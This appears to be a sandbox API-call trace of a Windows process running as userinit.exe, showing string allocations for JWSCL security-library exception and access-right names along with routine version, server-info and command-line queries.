[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a3fa68*="EJwsclJwShellExecuteException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a3fa50*="EJwsclShellExecuteException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a3fa38*="EJwsclElevationException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a3fa20*="EJwsclAbortException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a3fa08*="EJwsclSuRunErrorException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a3f9f0*="EJwsclElevateProcessException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a3f9d8*="EJwsclCertApiException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a3f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a3f9a8*="EJwsclInvalidStartupInfo") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a3f990*="EJwsclFirewallNoExceptionsException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a3f978*="EJwsclFirewallInactiveException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a3f960*="EJwsclFirewallDelRuleException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a3f918*="EJwsclFirewallAddRuleException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a3f840*="EJwsclGetFWStateException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a3f828*="EJwsclSetFWStateException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a3f810*="EJwsclFirewallProfileInitException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a3f7f8*="EJwsclFirewallInitException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a3f7e0*="EJwsclGenericFirewallException") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a3f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a3f7b0*="EJwsclInvalidRegistryPath") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a3f798*="EJwsclEndOfStream") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a3f780*="EJwsclClassTypeMismatch") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a3f768*="EJwsclInvalidHandle") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a3f750*="EJwsclInvalidIndex") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a3f738*="EJwsclInvalidSession") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a3f720*="EJwsclMissingEvent") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a3f708*="EJwsclInvalidPointerType") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a3f6f0*="EJwsclCreateProcessFailed") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a3f6d8*="EJwsclNilPointer") returned 1
[0149.781] SysReAllocStringLen (in: pbstr=0x2a3f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a3f6c0*="EJwsclUnimplemented") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a3f6a8*="EJwsclInitWellKnownException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a3f690*="EJwsclKeyApiException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a3f678*="EJwsclKeyException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a3f660*="EJwsclHashApiException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a3f648*="EJwsclHashException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a3f630*="EJwsclCSPApiException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a3f618*="EJwsclCSPException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a3f600*="EJwsclTerminalSessionException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a3f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a3f5d0*="EJwsclTerminalServiceException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a3f5b8*="EJwsclTerminalServerConnectException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a3f5a0*="EJwsclTerminalServerException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a3f588*="EJwsclCryptUnsupportedException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a3f570*="EJwsclCryptApiException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a3f558*="EJwsclCryptException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a3f540*="EJwsclOSError") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a3f528*="EJwsclResourceInitFailed") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a3f510*="EJwsclResourceUnequalCount") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a3f4f8*="EJwsclResourceNotFound") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a3f4e0*="EJwsclResourceException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a3f4c8*="EJwsclFailedAddACE") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a3f4b0*="EJwsclUnsupportedACE") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a3f498*="EJwsclOpenWindowStationException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a3f480*="EJwsclWindowStationException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a3f468*="EJwsclCloseDesktopException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a3f450*="EJwsclCreateDesktopException") returned 1
[0149.782] SysReAllocStringLen (in: pbstr=0x2a3f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a3f438*="EJwsclOpenDesktopException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a3f420*="EJwsclDesktopException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a3f408*="EJwsclSACLAccessDenied") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a3f3f0*="EJwsclAccessDenied") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a3f3d8*="EJwsclLSAException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a3f3c0*="ESetOwnerException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a3f3a8*="ESetSecurityException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a3f390*="EJwsclInvalidParentDescriptor") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a3f378*="EJwsclInvalidKeyPath") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a3f360*="EJwsclInvalidGenericAccessMask") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a3f348*="EJwsclAdaptSecurityInfoException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a3f330*="EJwsclThreadException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a3f318*="EJwsclInvalidObjectException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a3f300*="EJwsclSecurityObjectException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a3f2e8*="EJwsclHashMismatch") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a3f2d0*="EJwsclStreamHashException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a3f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a3f2a0*="EJwsclStreamSizeException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a3f288*="EJwsclStreamException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a3f270*="EJwsclNoSuchLogonSession") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a3f258*="EJwsclInvalidFlagsException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a3f240*="EJwsclProcessNotFound") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a3f228*="EJwsclInvalidParameterException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a3f210*="EJwsclInvalidPathException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a3f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a3f1e0*="EJwsclInvalidRevision") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a3f1c8*="EJwsclInvalidAceMismatch") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a3f1b0*="EJwsclRevisionMismatchException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a3f198*="EJwsclInvalidACEException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a3f180*="EJwsclReadOnlyPropertyException") returned 1
[0149.783] SysReAllocStringLen (in: pbstr=0x2a3f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a3f168*="EJwsclDuplicateListEntryException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a3f150*="EJwsclIndexOutOfBoundsException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a3f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a3f120*="EJwsclInvalidKnownSIDException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a3f108*="EJwsclInvalidComputer") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a3f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a3f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a3f0c0*="EJwsclInvalidSIDException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a3f0a8*="EJwsclInvalidSecurityListException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a3f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a3f078*="EJwsclEmptyACLException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a3f060*="EJwsclNILParameterException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a3f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a3f030*="EJwsclInvalidObjectArrayException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a3f018*="EJwsclProcessIdNotAvailable") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a3f000*="EJwsclWinCallFailedException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a3efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a3efd0*="EJwsclNotImplementedException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a3efb8*="EJwsclAccessTypeException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a3efa0*="EJwsclAdjustPrivilegeException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a3ef88*="EJwsclPrivilegeCheckException") returned 1
[0149.784] SysReAllocStringLen (in: pbstr=0x2a3ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a3ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a3ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a3ef40*="EJwsclPrivilegeException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a3ef28*="EJwsclNotEnoughMemory") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a3ef10*="EJwsclInvalidTokenHandle") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a3eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a3eee0*="EJwsclDuplicateTokenException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a3eec8*="EJwsclInvalidOwnerException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a3eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a3ee98*="EJwsclTokenPrimaryException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a3ee80*="EJwsclTokenImpersonationException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a3ee68*="EJwsclTokenInformationException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a3ee50*="EJwsclSharedTokenException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a3ee38*="EJwsclOpenProcessTokenException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a3ee20*="EJwsclOpenThreadTokenException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a3ee08*="EJwsclSecurityException") returned 1
[0149.785] SysReAllocStringLen (in: pbstr=0x2a3edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a3edf0*="Exception") returned 1
[0149.785] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.786] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0149.786] GetVersionExA (in: lpVersionInformation=0x18f5d4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x610000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xfc\xf5\x18") | out: lpVersionInformation=0x18f5d4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0149.786] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0149.786] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0149.793] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0149.793] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x18f658 | out: bufptr=0x18f658) returned 0x0
[0149.799] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0149.799] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0149.799] NetApiBufferFree (Buffer=0x631d00) returned 0x0
[0149.799] SetErrorMode (uMode=0x8000) returned 0x1
[0149.799] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0149.799] SetErrorMode (uMode=0x1) returned 0x8000
[0149.800] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0149.802] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0149.804] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0149.806] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ec40*="DELETE") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ec30*="READ_CONTROL") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ec20*="WRITE_OWNER") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ec10*="WRITE_DAC") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a3ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a3ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a3ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a3ebd0*="FILE_WRITE_DATA") returned 1
